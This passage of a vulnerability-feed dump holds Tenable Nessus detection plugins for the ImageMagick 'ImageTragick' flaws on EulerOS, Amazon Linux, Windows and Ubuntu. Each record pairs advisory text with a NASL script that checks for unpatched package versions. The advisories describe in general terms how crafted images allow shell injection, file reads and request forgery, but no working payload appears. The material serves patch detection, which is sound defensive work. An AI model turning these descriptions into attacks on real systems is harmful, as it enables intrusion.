\"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.7.8.9-13\",\n \"ImageMagick-c++-6.7.8.9-13\",\n \"ImageMagick-perl-6.7.8.9-13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:19", "description": "It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files.\n(CVE-2016-3715 , CVE-2016-3716 , CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ImageMagick (ALAS-2016-699) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ImageMagick", "p-cpe:/a:amazon:linux:imagemagick-c%2b%2b", "p-cpe:/a:amazon:linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:ImageMagick-debuginfo", "p-cpe:/a:amazon:linux:ImageMagick-devel", "p-cpe:/a:amazon:linux:ImageMagick-doc", "p-cpe:/a:amazon:linux:ImageMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-699.NASL", "href": "https://www.tenable.com/plugins/nessus/91047", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-699.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91047);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"ALAS\", value:\"2016-699\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Amazon Linux AMI : ImageMagick (ALAS-2016-699) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick\nor an unsuspecting user using the ImageMagick utilities, would allow\nthe attacker to disclose the contents of arbitrary files.\n(CVE-2016-3715 , CVE-2016-3716 , CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ImageMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-devel-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-doc-6.7.8.9-13.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-perl-6.7.8.9-13.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:53", "description": "The remote Windows host has a version of ImageMagick installed that is prior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as ImageTragick, exists due to a failure to properly filter shell characters in filenames passed to delegate commands. A remote attacker can exploit this, via specially crafted images, to inject shell commands and execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo protocol that allows an attacker to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'ms' pseudo protocol that allows an attacker to move arbitrary files to arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo protocol that allows an attacker, via a specially crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability exists due to an unspecified flaw related to request handling between a user and the server. A remote attacker can exploit this, via an MVG file with a specially crafted fill element, to bypass access restrictions and conduct host-based attacks.\n (CVE-2016-3718)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-04T00:00:00", "type": "nessus", "title": "ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:imagemagick:imagemagick"], "id": "IMAGEMAGICK_7_0_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/90892", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90892);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of ImageMagick.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'ms' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.imagemagick.org/script/changelog.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ImageMagick version 7.0.1-1 / 6.9.3-10 or later.\n\nNote that you may need to manually uninstall the vulnerable version\nfrom the system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:imagemagick:imagemagick\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"imagemagick_installed.nasl\");\n script_require_keys(\"installed_sw/ImageMagick\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ImageMagick\";\n\n# Get installs\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\ndisplay_version = install['display_version'];\nversion = install['version'];\nbuild = install['build'];\npath = install['path'];\n\nvuln = FALSE;\n\nif (version =~ \"^6\\.\")\n{\n fix = \"6.9.3\";\n fix_build = 10;\n}\nelse if (version =~ \"^7\\.\")\n{\n fix = \"7.0.1\";\n fix_build = 1;\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n\ndisplay_fix = fix + \"-\" + fix_build;\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;\n\nif ((ver_compare(ver:version, fix:fix, strict:FALSE) == 0) &&\n build < fix_build\n )\n vuln = TRUE;\n\nif (vuln)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n items = make_array(\"Installed version\", display_version,\n \"Fixed version\", display_fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:58:22", "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly sanitized untrusted input. A remote attacker could use these issues to execute arbitrary code. These issues are known as 'ImageTragick'. This update disables problematic coders via the /etc/ImageMagick-6/policy.xml configuration file. In certain environments the coders may need to be manually re-enabled after making sure that ImageMagick does not process untrusted input.\n(CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via an image file or filename. A remote attacker could use this issue to execute arbitrary code. (CVE-2016-5118).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-03T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : imagemagick vulnerabilities (USN-2990-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5118"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:imagemagick", "p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16", "p-cpe:/a:canonical:ubuntu_linux:imagemagick-common", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b-6.q16-5v5", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b4", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b5", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore4", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore5", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-2990-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91450", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2990-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91450);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5118\");\n script_xref(name:\"USN\", value:\"2990-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : imagemagick vulnerabilities (USN-2990-1) (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly\nsanitized untrusted input. A remote attacker could use these issues to\nexecute arbitrary code. These issues are known as 'ImageTragick'. This\nupdate disables problematic coders via the\n/etc/ImageMagick-6/policy.xml configuration file. In certain\nenvironments the coders may need to be manually re-enabled after\nmaking sure that ImageMagick does not process untrusted input.\n(CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\nCVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands\nvia an image file or filename. A remote attacker could use this issue\nto execute arbitrary code. (CVE-2016-5118).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2990-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-5v5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2021 Canonical, Inc. / NASL script (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"imagemagick\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libmagick++4\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libmagickcore4\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagick++5\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick-common\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"imagemagick / imagemagick-6.q16 / imagemagick-common / etc\");\n}\n", "cvss": {"score": 10, "vector": 